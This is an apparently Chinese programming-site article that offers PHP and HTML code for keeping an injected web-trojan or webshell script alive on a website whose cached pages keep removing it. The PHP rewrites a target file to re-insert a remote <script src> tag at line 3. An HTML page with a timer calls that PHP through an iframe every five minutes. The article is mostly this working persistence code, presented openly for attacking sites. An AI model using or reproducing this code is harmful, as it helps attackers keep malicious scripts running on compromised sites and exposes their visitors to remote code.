程序師世界是廣大編程愛好者互助、分享、學習的平台,程序師世界有你更精彩!
首頁
編程語言
C語言|JAVA編程
Python編程
網頁編程
ASP編程|PHP編程
JSP編程
數據庫知識
MYSQL數據庫|SqlServer數據庫
Oracle數據庫|DB2數據庫
 程式師世界 >> 編程語言 >> 網頁編程 >> PHP編程 >> 關於PHP編程 >> php在文件指定行中寫入代碼

php在文件指定行中寫入代碼

編輯:關於PHP編程

有的站主頁是緩存頁面,你加入的網馬代碼或是webshell代碼經常被更新或是其它的因素干掉,所以弄了這個代碼:
 
<?php
 
$file="aa.php" ;
 
$code="<script src=http://www.google/ga.js></script>";
 
$f=fopen($file,"r+");
 
$content=fread($f,filesize($file));
 
fclose($f);
 
if(!strstr($content,$code)){
 
$arrInsert = insertContent($file, $code, 3);
 
unlink($file);
 
 
 
foreach($arrInsert as $value)
 
{
 
file_put_contents($file, $value, FILE_APPEND);
 
}
 
 
 
}
 
 
 
function insertContent($source, $s, $iLine) {
 
$file_handle = fopen($source, "r");
 
$i = 0;
 
$arr = array();
 
while (!feof($file_handle)) {
 
$line = fgets($file_handle);
 
++$i;
 
if ($i == $iLine) {
 
$arr[] = $line .$s . "\n";
 
}else {
 
$arr[] = $line;
 
}
 
}
 
fclose($file_handle);
 
return $arr;
 
}
 
?>
 
這個文件保存成php後,再用一個小程序隔幾分鐘指定執行它就可以。像operia浏覽器就有這個功能。不過我又加了個html代碼來運行它,可以用ie了,打開這個html後扔在哪就可以。
 
<HTML>
 
<HEAD>
 
 
 
</HEAD>
 
<BODY>
 
<SCRIPT LANGUAGE="JScript">
 
function singOut()  {
 
var O = document.createElement("iframe");
 
O.src="http:// www.2cto.com / 上邊的php文件.php";
 
O.width=100;
 
O.height=100;
 
document.body.appendChild(O);
 
}
 
window.setInterval("singOut();",300000);
 
</SCRIPT>
 
</BODY>
 
</HTML>

  1. 上一頁:
  2. 下一頁:
Copyright © 程式師世界 All Rights Reserved